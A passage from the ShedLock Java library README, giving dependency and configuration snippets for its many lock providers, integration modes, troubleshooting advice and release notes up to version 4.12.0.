capabilities of this lock provider are really limited and that the whole ecosystem around R2DBC
is in flux and may easily break.
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-r2dbc</artifactId>
    <version>5.13.0</version>
</dependency>
```
and use it.
```java
@Override
protected LockProvider getLockProvider() {
return new R2dbcLockProvider(connectionFactory);
}
```
I recommend using [R2DBC connection pool](https://github.com/r2dbc/r2dbc-pool).
#### jOOQ lock provider
First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above.
Add dependency
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-jooq</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.jooq.JooqLockProvider;
...
@Bean
public LockProvider getLockProvider(DSLContext dslContext) {
return new JooqLockProvider(dslContext);
}
```
The jOOQ provider has slightly different transactional behavior. While the other JDBC lock providers
create new transaction (with REQUIRES_NEW), jOOQ [does not support setting it](https://github.com/jOOQ/jOOQ/issues/4836).
ShedLock tries to create a new transaction, but depending on your set-up, ShedLock DB operations may
end-up being part of the enclosing transaction.
If you need to configure the table name, schema or column names, you can use jOOQ render mapping as
described [here](https://github.com/lukas-krecan/ShedLock/issues/1830#issuecomment-2015820509).
#### Micronaut Data Jdbc
If you are using Micronaut Data and you do not want to add a dependency on Spring JDBC, you can use
Micronaut JDBC support. Just be aware that it has only basic functionality when compared to
the JdbcTemplate provider.
First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above.
Add dependency
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-jdbc-micronaut</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.jdbc.micronaut.MicronautJdbcLockProvider;
...
@Singleton
public LockProvider lockProvider(TransactionOperations transactionManager) {
return new MicronautJdbcLockProvider(transactionManager);
}
```
#### Mongo
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-mongo</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.mongo.MongoLockProvider;
...
@Bean
public LockProvider lockProvider(MongoClient mongo) {
return new MongoLockProvider(mongo.getDatabase(databaseName));
}
```
Please note that MongoDB integration requires Mongo >= 2.4 and mongo-java-driver >= 3.7.0
#### Reactive Mongo
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-mongo-reactivestreams</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.mongo.reactivestreams.ReactiveStreamsMongoLockProvider;
...
@Bean
public LockProvider lockProvider(MongoClient mongo) {
return new ReactiveStreamsMongoLockProvider(mongo.getDatabase(databaseName));
}
```
Please note that MongoDB integration requires Mongo >= 4.x and mongodb-driver-reactivestreams 1.x
#### DynamoDB 2
Depends on AWS SDK v2.
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-dynamodb2</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.dynamodb2.DynamoDBLockProvider;
...
@Bean
public LockProvider lockProvider(software.amazon.awssdk.services.dynamodb.DynamoDbClient dynamoDB) {
return new DynamoDBLockProvider(dynamoDB, ""Shedlock"");
}
```
> Please note that the lock table must be created externally with `_id` as a partition key.
> `DynamoDBUtils#createLockTable` may be used for creating it programmatically.
> A table definition is available from `DynamoDBLockProvider`'s Javadoc.
#### ZooKeeper (using Curator)
Import
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-zookeeper-curator</artifactId>
    <version>5.13.0</version>
</dependency>
```
and configure
```java
import net.javacrumbs.shedlock.provider.zookeeper.curator.ZookeeperCuratorLockProvider;
...
@Bean
public LockProvider lockProvider(org.apache.curator.framework.CuratorFramework client) {
return new ZookeeperCuratorLockProvider(client);
}
```
By default, nodes for locks will be created under `/shedlock` node.
#### Redis (using Spring RedisConnectionFactory)
Import
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-redis-spring</artifactId>
    <version>5.13.0</version>
</dependency>
```
and configure
```java
import net.javacrumbs.shedlock.provider.redis.spring.RedisLockProvider;
import org.springframework.data.redis.connection.RedisConnectionFactory;
...
@Bean
public LockProvider lockProvider(RedisConnectionFactory connectionFactory) {
return new RedisLockProvider(connectionFactory, ENV);
}
```
#### Redis (using Spring ReactiveRedisConnectionFactory)
Import
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-redis-spring</artifactId>
    <version>5.13.0</version>
</dependency>
```
and configure
```java
import net.javacrumbs.shedlock.provider.redis.spring.ReactiveRedisLockProvider;
import org.springframework.data.redis.connection.ReactiveRedisConnectionFactory;
...
@Bean
public LockProvider lockProvider(ReactiveRedisConnectionFactory connectionFactory) {
return new ReactiveRedisLockProvider.Builder(connectionFactory)
.environment(ENV)
.build();
}
```
Redis lock provider uses classical lock mechanism as described [here](https://redis.io/commands/setnx#design-pattern-locking-with-codesetnxcode)
which may not be reliable in case of Redis master failure.
#### Redis (using Jedis)
Import
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-redis-jedis4</artifactId>
    <version>5.13.0</version>
</dependency>
```
and configure
```java
import net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvider;
...
@Bean
public LockProvider lockProvider(JedisPool jedisPool) {
return new JedisLockProvider(jedisPool, ENV);
}
```
#### Hazelcast
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-hazelcast4</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.hazelcast4.HazelcastLockProvider;
...
@Bean
public HazelcastLockProvider lockProvider(HazelcastInstance hazelcastInstance) {
return new HazelcastLockProvider(hazelcastInstance);
}
```
#### Couchbase
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-couchbase-javaclient3</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.couchbase.javaclient.CouchbaseLockProvider;
...
@Bean
public CouchbaseLockProvider lockProvider(Bucket bucket) {
return new CouchbaseLockProvider(bucket);
}
```
For Couchbase 3 use `shedlock-provider-couchbase-javaclient3` module and `net.javacrumbs.shedlock.provider.couchbase3` package.
#### Elasticsearch
I am really not sure it's a good idea to use Elasticsearch as a lock provider. But if you have no other choice, you can. Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-elasticsearch8</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.elasticsearch8.ElasticsearchLockProvider;
...
@Bean
public ElasticsearchLockProvider lockProvider(ElasticsearchClient client) {
return new ElasticsearchLockProvider(client);
}
```
#### OpenSearch
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-opensearch</artifactId>
    <version>4.36.1</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.opensearch.OpenSearchLockProvider;
...
@Bean
public OpenSearchLockProvider lockProvider(RestHighLevelClient highLevelClient) {
return new OpenSearchLockProvider(highLevelClient);
}
```
#### CosmosDB
CosmosDB support is provided by a third-party module available [here](https://github.com/jesty/shedlock-provider-cosmosdb)
#### Cassandra
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-cassandra</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider;
import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider.Configuration;
...
@Bean
public CassandraLockProvider lockProvider(CqlSession cqlSession) {
return new CassandraLockProvider(Configuration.builder().withCqlSession(cqlSession).withTableName(""lock"").build());
}
```
Example for creating default keyspace and table in local Cassandra instance:
```sql
CREATE KEYSPACE shedlock with replication={'class':'SimpleStrategy', 'replication_factor':1} and durable_writes=true;
CREATE TABLE shedlock.lock (name text PRIMARY KEY, lockUntil timestamp, lockedAt timestamp, lockedBy text);
```
Please, note that CassandraLockProvider uses Cassandra driver v4, which is part of Spring Boot since 2.3.
#### Consul
ConsulLockProvider has one limitation: lockAtMostFor setting will have a minimum value of 10 seconds. It is dictated by consul's session limitations.
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-consul</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.consul.ConsulLockProvider;
...
@Bean // for micronaut please define preDestroy property @Bean(preDestroy=""close"")
public ConsulLockProvider lockProvider(com.ecwid.consul.v1.ConsulClient consulClient) {
return new ConsulLockProvider(consulClient);
}
```
Please, note that Consul lock provider uses [ecwid consul-api client](https://github.com/Ecwid/consul-api), which is part of spring cloud consul integration (the `spring-cloud-starter-consul-discovery` package).
#### ArangoDB
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-arangodb</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.arangodb.ArangoLockProvider;
...
@Bean
public ArangoLockProvider lockProvider(final ArangoOperations arangoTemplate) {
return new ArangoLockProvider(arangoTemplate.driver().db(DB_NAME));
}
```
Please, note that ArangoDB lock provider uses ArangoDB driver v6.7, which is part of [arango-spring-data](https://github.com/arangodb/spring-data) in version 3.3.0.
#### Neo4j
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-neo4j</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.core.LockConfiguration;
...
@Bean
Neo4jLockProvider lockProvider(org.neo4j.driver.Driver driver) {
return new Neo4jLockProvider(driver);
}
```
Please make sure that ```neo4j-java-driver``` version used by ```shedlock-provider-neo4j``` matches the driver version used in your
project (if you use `spring-boot-starter-data-neo4j`, it is probably provided transitively).
#### Etcd
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-etcd-jetcd</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.etcd.jetcd.EtcdLockProvider;
...
@Bean
public LockProvider lockProvider(Client client) {
return new EtcdLockProvider(client);
}
```
#### Apache Ignite
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-ignite</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.ignite.IgniteLockProvider;
...
@Bean
public LockProvider lockProvider(Ignite ignite) {
return new IgniteLockProvider(ignite);
}
```
#### In-Memory
If you want to use a lock provider in tests, there is an in-memory implementation.
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-inmemory</artifactId>
    <version>5.13.0</version>
    <scope>test</scope>
</dependency>
```
```java
import net.javacrumbs.shedlock.provider.inmemory.InMemoryLockProvider;
...
@Bean
public LockProvider lockProvider() {
return new InMemoryLockProvider();
}
```
#### Memcached (using spymemcached)
Please, be aware that memcached is not a database but a cache. It means that if the cache is full,
[the lock may be released prematurely](https://stackoverflow.com/questions/6868256/memcached-eviction-prior-to-key-expiry/10456364#10456364)
**Use only if you know what you are doing.**
Import
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-memcached-spy</artifactId>
    <version>5.13.0</version>
</dependency>
```
and configure
```java
import net.javacrumbs.shedlock.provider.memcached.spy.MemcachedLockProvider;
...
@Bean
public LockProvider lockProvider(net.spy.memcached.MemcachedClient client) {
return new MemcachedLockProvider(client, ENV);
}
```
P.S.:
Memcached Standard Protocol:
- A key (an arbitrary string up to 250 bytes in length; no spaces or newlines for ASCII mode)
- An expiration time, in `seconds`. '0' means never expire. Can be up to 30 days; after 30 days it is treated as a unix timestamp of an exact date (so `seconds`, `minutes` and `days` of less than 30 days are supported).
#### Datastore
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-datastore</artifactId>
    <version>5.13.0</version>
</dependency>
```
and configure
```java
import net.javacrumbs.shedlock.provider.datastore.DatastoreLockProvider;
...
@Bean
public LockProvider lockProvider(com.google.cloud.datastore.Datastore datastore) {
return new DatastoreLockProvider(datastore);
}
```
#### Spanner
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-spanner</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure
```java
import net.javacrumbs.shedlock.provider.spanner.SpannerLockProvider;
...
// Basic
@Bean
public LockProvider lockProvider(DatabaseClient databaseClient) {
return new SpannerLockProvider(databaseClientSupplier);
}
// Custom host, table and column names
@Bean
public LockProvider lockProvider(DatabaseClient databaseClient) {
var config = SpannerLockProvider.Configuration.builder()
.withDatabaseClient(databaseClientSupplier)
.withTableConfiguration(SpannerLockProvider.TableConfiguration.builder()
...
// Custom table and column names
.build())
.withHostName(""customHostName"")
.build();
return new SpannerLockProvider(config);
}
```
## Multi-tenancy
If you have a multi-tenancy use-case you can use a lock provider similar to this one
(see the full [example](https://github.com/lukas-krecan/ShedLock/blob/master/providers/jdbc/shedlock-provider-jdbc-template/src/test/java/net/javacrumbs/shedlock/provider/jdbctemplate/MultiTenancyLockProviderIntegrationTest.java#L87))
```java
private static abstract class MultiTenancyLockProvider implements LockProvider {
private final ConcurrentHashMap<String, LockProvider> providers = new ConcurrentHashMap<>();
@Override
public @NonNull Optional<SimpleLock> lock(@NonNull LockConfiguration lockConfiguration) {
String tenantName = getTenantName(lockConfiguration);
return providers.computeIfAbsent(tenantName, this::createLockProvider).lock(lockConfiguration);
}
protected abstract LockProvider createLockProvider(String tenantName) ;
protected abstract String getTenantName(LockConfiguration lockConfiguration);
}
```
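For illustration, a concrete subclass (assuming the abstract provider above is made accessible in your code) could derive the tenant from a lock-name prefix and keep one JDBC provider per tenant; `dataSourceFor(...)` is a hypothetical lookup you would implement yourself:
```java
public class TenantPrefixLockProvider extends MultiTenancyLockProvider {
    @Override
    protected String getTenantName(LockConfiguration lockConfiguration) {
        // assumes lock names look like ""tenantA-myTask""
        return lockConfiguration.getName().split(""-"")[0];
    }
    @Override
    protected LockProvider createLockProvider(String tenantName) {
        // dataSourceFor(...) is a hypothetical per-tenant DataSource lookup
        return new JdbcTemplateLockProvider(new JdbcTemplate(dataSourceFor(tenantName)));
    }
}
```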
## Customization
You can customize the behavior of the library by implementing `LockProvider` interface. Let's say you want to implement
a special behavior after a lock is obtained. You can do it like this:
```java
public class MyLockProvider implements LockProvider {
private final LockProvider delegate;
public MyLockProvider(LockProvider delegate) {
this.delegate = delegate;
}
@Override
public Optional<SimpleLock> lock(LockConfiguration lockConfiguration) {
Optional<SimpleLock> lock = delegate.lock(lockConfiguration);
if (lock.isPresent()) {
// do something
}
return lock;
}
}
```
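The decorator can then wrap whichever provider you already use, for example (sketch):
```java
@Bean
public LockProvider lockProvider(DataSource dataSource) {
    // wrap the real provider with the customized one
    return new MyLockProvider(new JdbcTemplateLockProvider(new JdbcTemplate(dataSource)));
}
```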
## Duration specification
All the annotations where you need to specify a duration support the following formats
* duration+unit - `1s`, `5ms`, `5m`, `1d` (Since 4.0.0)
* duration in ms - `100` (only Spring integration)
* ISO-8601 - `PT15M` (see [Duration.parse()](https://docs.oracle.com/javase/8/docs/api/java/time/Duration.html#parse-java.lang.CharSequence-) documentation)
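For example, the following annotation expresses fifteen minutes in ISO-8601; the commented alternatives are equivalent (illustrative snippet):
```java
@Scheduled(cron = ""0 0 * * * *"")
// equivalently lockAtMostFor = ""15m"" (duration + unit) or ""900000"" (ms, Spring integration only)
@SchedulerLock(name = ""reportTask"", lockAtMostFor = ""PT15M"", lockAtLeastFor = ""5m"")
public void generateReport() {
    // do something
}
```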
## Extending the lock
There are some use-cases which require extending a currently held lock. You can use LockExtender in the
following way:
```java
LockExtender.extendActiveLock(Duration.ofMinutes(5), ZERO);
```
Please note that not all lock provider implementations support lock extension.
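A sketch of how the extension might be used inside a locked task (`hasMoreWork()`, `nextChunk()` and `process()` are hypothetical helpers, durations are arbitrary):
```java
@Scheduled(fixedDelay = 60_000)
@SchedulerLock(name = ""longRunningTask"", lockAtMostFor = ""10m"")
public void longRunningTask() {
    while (hasMoreWork()) {
        process(nextChunk());
        // extend the currently held lock by another 5 minutes, with no lockAtLeastFor
        LockExtender.extendActiveLock(Duration.ofMinutes(5), Duration.ZERO);
    }
}
```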
## KeepAliveLockProvider
There is also KeepAliveLockProvider which is able to keep the lock alive by periodically extending it. It can be
used by wrapping the original lock provider. My personal opinion is that it should be used only in special cases;
it adds more complexity to the library and the flow is harder to reason about, so please use it in moderation.
```java
@Bean
public LockProvider lockProvider(...) {
return new KeepAliveLockProvider(new XyzProvider(...), scheduler);
}
```
KeepAliveLockProvider extends the lock in the middle of the lockAtMostFor interval. For example, if the lockAtMostFor
is 10 minutes the lock is extended every 5 minutes for 10 minutes until the lock is released. Please note that the minimal
lockAtMostFor time supported by this provider is 30s. The scheduler is used only for the lock extension, single thread
should be enough.
## Micronaut integration
Since version 4.0.0, it's possible to use Micronaut framework for integration
Import the project:
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-micronaut</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure default lockAtMostFor value (application.yml):
```yaml
shedlock:
defaults:
lock-at-most-for: 1m
```
Configure lock provider:
```java
@Singleton
public LockProvider lockProvider() {
... select and configure your lock provider
}
```
Configure the scheduled task:
```java
@Scheduled(fixedDelay = ""1s"")
@SchedulerLock(name = ""myTask"")
public void myTask() {
assertLocked();
...
}
```
## CDI integration
Since version 5.0.0, it's possible to use CDI for integration (tested only with Quarkus)
Import the project:
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-cdi</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure default lockAtMostFor value (application.properties):
```properties
shedlock.defaults.lock-at-most-for=PT30S
```
Configure lock provider:
```java
@Produces
@Singleton
public LockProvider lockProvider() {
...
}
```
Configure the scheduled task:
```java
@Scheduled(every = ""1s"")
@SchedulerLock(name = ""myTask"")
public void myTask() {
assertLocked();
...
}
```
The implementation only depends on `jakarta.enterprise.cdi-api` and `microprofile-config-api` so it should be
usable in other CDI compatible frameworks, but it has not been tested with anything else than Quarkus. It's
built on top of javax annotation as Quarkus has not moved to Jakarta EE namespace yet.
The support is minimalistic; for example, there is no support for expressions in the annotation parameters yet.
If you need it, feel free to send a PR.
## Locking without a framework
It is possible to use ShedLock without a framework
```java
LockingTaskExecutor executor = new DefaultLockingTaskExecutor(lockProvider);
...
Instant lockAtMostUntil = Instant.now().plusSeconds(600);
executor.executeWithLock(runnable, new LockConfiguration(""lockName"", lockAtMostUntil));
```
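Putting the pieces together, a minimal sketch (assuming a `dataSource` is available and reusing the JdbcTemplate provider and the two-argument `LockConfiguration` constructor shown above):
```java
LockProvider lockProvider = new JdbcTemplateLockProvider(new JdbcTemplate(dataSource));
LockingTaskExecutor executor = new DefaultLockingTaskExecutor(lockProvider);

Runnable runnable = () -> System.out.println(""running under the lock"");
Instant lockAtMostUntil = Instant.now().plusSeconds(600);
executor.executeWithLock(runnable, new LockConfiguration(""lockName"", lockAtMostUntil));
```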
## Extending the lock
Some lock providers support extension of the lock. For the time being, it requires manual lock manipulation,
directly using `LockProvider` and calling `extend` method on the `SimpleLock`.
## Modes of Spring integration
ShedLock supports two modes of Spring integration. One that uses an AOP proxy around scheduled method (PROXY_METHOD)
and one that proxies TaskScheduler (PROXY_SCHEDULER)
#### Scheduled Method proxy
Since version 4.0.0, the default mode of Spring integration is an AOP proxy around the annotated method.
The main advantage of this mode is that it plays well with other frameworks that want to somehow alter the default Spring scheduling mechanism.
The disadvantage is that the lock is applied even if you call the method directly. If the method returns a value and the lock is held
by another process, null or an empty Optional will be returned (primitive return types are not supported).
Final and non-public methods are not proxied so either you have to make your scheduled methods public and non-final or use TaskScheduler proxy.
![Method proxy sequenceDiagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/method_proxy.png)
#### TaskScheduler proxy
This mode wraps Spring `TaskScheduler` in an AOP proxy. **This mode does not play well with instrumentation libraries**
like OpenTelemetry that also wrap TaskScheduler. Please only use it if you know what you are doing.
It can be switched-on like this (PROXY_SCHEDULER was the default method before 4.0.0):
```java
@EnableSchedulerLock(interceptMode = PROXY_SCHEDULER)
```
If you do not specify your task scheduler, a default one is created for you. If you have special needs, just create a bean implementing `TaskScheduler`
interface and it will get wrapped into the AOP proxy automatically.
```java
@Bean
public TaskScheduler taskScheduler() {
return new MySpecialTaskScheduler();
}
```
Alternatively, you can define a bean of type `ScheduledExecutorService` and it will automatically be used by the task
scheduling mechanism.
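For example, a plain JDK executor bean would do (sketch):
```java
@Bean
public ScheduledExecutorService scheduledExecutorService() {
    // picked up automatically by the task scheduling mechanism
    return Executors.newScheduledThreadPool(4);
}
```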
![TaskScheduler proxy sequence diagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/scheduler_proxy.png)
### Spring XML configuration
Spring XML configuration is not supported as of version 3.0.0. If you need it, please use version 2.6.0 or file an issue explaining why it is needed.
## Lock assert
To prevent misconfiguration errors, like AOP misconfiguration, missing annotation etc., you can assert that the lock
works by using LockAssert:
```java
@Scheduled(...)
@SchedulerLock(..)
public void scheduledTask() {
// To assert that the lock is held (prevents misconfiguration errors)
LockAssert.assertLocked();
// do something
}
```
In unit tests you can switch-off the assertion by calling `LockAssert.TestHelper.makeAllAssertsPass(true)` on given thread (as in this [example](https://github.com/lukas-krecan/ShedLock/commit/e8d63b7c56644c4189e0a8b420d8581d6eae1443)).
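For example, in a JUnit test (sketch; `myService` is a hypothetical bean under test):
```java
@Test
void scheduledTaskWorksWithoutRealLock() {
    // make LockAssert.assertLocked() pass even though no lock is held in the test
    LockAssert.TestHelper.makeAllAssertsPass(true);
    try {
        myService.scheduledTask();
    } finally {
        LockAssert.TestHelper.makeAllAssertsPass(false);
    }
}
```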
## Kotlin gotchas
The library is tested with Kotlin and works fine. The only issue is Spring AOP which does not work on final method. If you use `@SchedulerLock` with `@Component`
annotation, everything should work since Kotlin Spring compiler plugin will automatically 'open' the method for you. If `@Component` annotation is not present, you
have to open the method by yourself. (see [this issue](https://github.com/lukas-krecan/ShedLock/issues/1268) for more details)
## Caveats
Locks in ShedLock have an expiration time which leads to the following possible issues.
1. If the task runs longer than `lockAtMostFor`, the task can be executed more than once
2. If the clock difference between two nodes is more than `lockAtLeastFor` or the minimal execution time, the task can be
executed more than once.
## Troubleshooting
Help, ShedLock does not do what it's supposed to do!
1. Upgrade to the newest version
2. Use [LockAssert](https://github.com/lukas-krecan/ShedLock#lock-assert) to ensure that AOP is correctly configured.
- If it does not work, please read about Spring AOP internals (for example [here](https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#aop-proxying))
3. Check the storage. If you are using JDBC, check the ShedLock table. If it's empty, ShedLock is not properly configured.
If there is more than one record with the same name, you are missing a primary key.
4. Use ShedLock debug log. ShedLock logs interesting information on DEBUG level with logger name `net.javacrumbs.shedlock`.
It should help you to see what's going on.
5. For short-running tasks consider using `lockAtLeastFor`. If the tasks are short-running, they could be executed one
after another, `lockAtLeastFor` can prevent it.
# Release notes
## 5.13.0 (2024-04-05)
* #1779 Ability to rethrow unexpected exception in JdbcTemplateStorageAccessor
* Dependency updates
## 5.12.0 (2024-02-29)
* #1800 Enable lower case for database type when using usingDbTime()
* #1804 Startup error with Neo4j 5.17.0
* Dependency updates
## 4.47.0 (2024-03-01)
* #1800 Enable lower case for database type when using usingDbTime() (thanks @yuagu1)
## 5.11.0 (2024-02-13)
* #1753 Fix SpEL for methods with parameters
* Dependency updates
## 5.10.2 (2023-12-07)
* #1635 fix makeAllAssertsPass locks only once
* Dependency updates
## 5.10.1 (2023-12-06)
* #1635 fix makeAllAssertsPass(false) throws NoSuchElementException
* Dependency updates
## 5.10.0 (2023-11-07)
* SpannerLockProvider added (thanks @pXius)
* Dependency updates
## 5.9.1 (2023-10-19)
* QuarkusRedisLockProvider supports Redis 6.2 (thanks @ricardojlrufino)
## 5.9.0 (2023-10-15)
* Support Quarkus 2 Redis client (thanks @ricardojlrufino)
* Better handling of timeouts in ReactiveStreamsMongoLockProvider
* Dependency updates
## 5.8.0 (2023-09-15)
* Support for Micronaut 4
* Use Merge instead of Insert for Oracle #1528 (thanks @xmojsic)
* Dependency updates
## 5.7.0 (2023-08-25)
* JedisLockProvider supports extending (thanks @shotmk)
* Better behavior when locks are nested #1493
## 4.46.0 (2023-09-05)
* JedisLockProvider (version 3) supports extending (thanks @shotmk)
## 4.45.0 (2023-09-04)
* JedisLockProvider supports extending (thanks @shotmk)
## 5.6.0
* Ability to explicitly set database product in JdbTemplateLockProvider (thanks @metron2)
* Removed forgotten versions from BOM
* Dependency updates
## 5.5.0 (2023-06-19)
* Datastore support (thanks @mmastika)
* Dependency updates
## 5.4.0 (2023-06-06)
* Handle [uncategorized SQL exceptions](https://github.com/lukas-krecan/ShedLock/pull/1442) (thanks @jaam)
* Dependency updates
## 5.3.0 (2023-05-13)
* Added shedlock-cdi module (supports newest CDI version)
* Dependency updates
## 5.2.0 (2023-03-06)
* Uppercase in JdbcTemplateProvider (thanks @Ragin-LundF)
* Dependency updates
## 5.1.0 (2023-01-07)
* Added SpEL support to @SchedulerLock name attribute (thanks @ipalbeniz)
* Dependency updates
## 5.0.1 (2022-12-10)
* Work around broken Spring 6 exception translation https://github.com/lukas-krecan/ShedLock/issues/1272
## 4.44.0 (2022-12-29)
* Insert ignore for MySQL https://github.com/lukas-krecan/ShedLock/commit/8a4ae7ad8103bb47f55d43bccf043ca261c24d7a
## 5.0.0 (2022-12-10)
* Requires JDK 17
* Tested with Spring 6 (Spring Boot 3)
* Micronaut updated to 3.x.x
* R2DBC 1.x.x (still sucks)
* Spring Data 3.x.x
* Rudimentary support for CDI (tested with quarkus)
* New jOOQ lock provider
* SLF4j 2
* Deleted all deprecated code and support for old versions of libraries
## 4.43.0 (2022-12-04)
* Better logging in JdbcTemplateProvider
* Dependency updates
## 4.42.0 (2022-09-16)
* Deprecate old Couchbase lock provider
* Dependency updates
## 4.41.0 (2022-08-17)
* Couchbase collection support (thanks @mesuutt)
* Dependency updates
## 4.40.0 (2022-08-11)
* Fixed caching issues when the app is started but the DB does not exist yet (#1129)
* Dependency updates
## 4.39.0 (2022-07-26)
* Introduced elasticsearch8 LockProvider and deprecated the original one (thanks @MarAra)
* Dependency updates
## 4.38.0 (2022-07-02)
* ReactiveRedisLockProvider added (thanks @ericwcc)
* Dependency updates
## 4.37.0 (2022-06-14)
* OpenSearch provider (thanks @Pinny3)
* Fix wrong reference to reactive Mongo in BOM #1048
* Dependency updates
## 4.36.0 (2022-05-28)
* shedlock-bom module added
* Dependency updates
## 4.35.0 (2022-05-16)
* Neo4j allows to specify database thanks @SergeyPlatonov
* Dependency updates
## 4.34.0 (2022-04-09)
* Dropped support for Hazelcast <= 3 as it has unfixed vulnerability
* Dropped support for Spring Data Redis 1 as it is not supported
* Dependency updates
## 4.33.0
* memcached provider added (thanks @pinkhello)
* Dependency updates
## 4.32.0
* JDBC provider does not change autocommit attribute
* Dependency updates
## 4.31.0
* Jedis 4 lock provider
* Dependency updates
## 4.30.0
* In-memory lock provider added (thanks @kkocel)
* Dependency updates
## 4.29.0
* R2DBC support added (thanks @sokomishalov)
* Library upgrades
## 4.28.0
* Neo4j lock provider added (thanks @thimmwork)
* Library upgrades
## 4.27.0
* Ability to set transaction isolation in JdbcTemplateLockProvider
* Library upgrades
## 4.26.0
* KeepAliveLockProvider introduced
* Library upgrades
## 4.25.0
* LockExtender added
## 4.24.0
* Support for Apache Ignite (thanks @wirtsleg)
* Library upgrades
## 4.23.0
* Ability to set serialConsistencyLevel in Cassandra (thanks @DebajitKumarPhukan)
* Introduced shedlock-provider-jdbc-micronaut module (thanks @drmaas)
## 4.22.1
* Catching and logging Cassandra exception
## 4.22.0
* Support for custom keyspace in Cassandra provider
## 4.21.0
* Elastic unlock using IMMEDIATE refresh policy #422
* DB2 JDBC lock provider uses microseconds in DB time
* Various library upgrades
## 4.20.1
* Fixed DB JDBC server time #378
## 4.20.0
* Support for etcd (thanks grofoli)
## 4.19.1
* Fixed devtools compatibility #368
## 4.19.0
* Support for enhanced configuration in Cassandra provider (thanks DebajitKumarPhukan)
* LockConfigurationExtractor exposed as a Spring bean #359
* Handle CannotSerializeTransactionException #364
## 4.18.0
* Fixed Consul support for tokens and added enhanced Consul configuration (thanks DrWifey)
## 4.17.0
* Consul support for tokens
## 4.16.0
* Spring - EnableSchedulerLock.order param added to specify AOP proxy order
* JDBC - Log unexpected exceptions at ERROR level
* Hazelcast upgraded to 4.1
## 4.15.1
* Fix session leak in Consul provider #340 (thanks @haraldpusch)
## 4.15.0
* ArangoDB lock provider added (thanks @patrick-birkle)
## 4.14.0
* Support for Couchbase 3 driver (thanks @blitzenzzz)
* Removed forgotten configuration files form micronaut package (thanks @drmaas)
* Shutdown hook for Consul (thanks @kaliy)
## 4.13.0
* Support for Consul (thanks @kaliy)
* Various dependencies updated
* Deprecated default LockConfiguration constructor
## 4.12.0
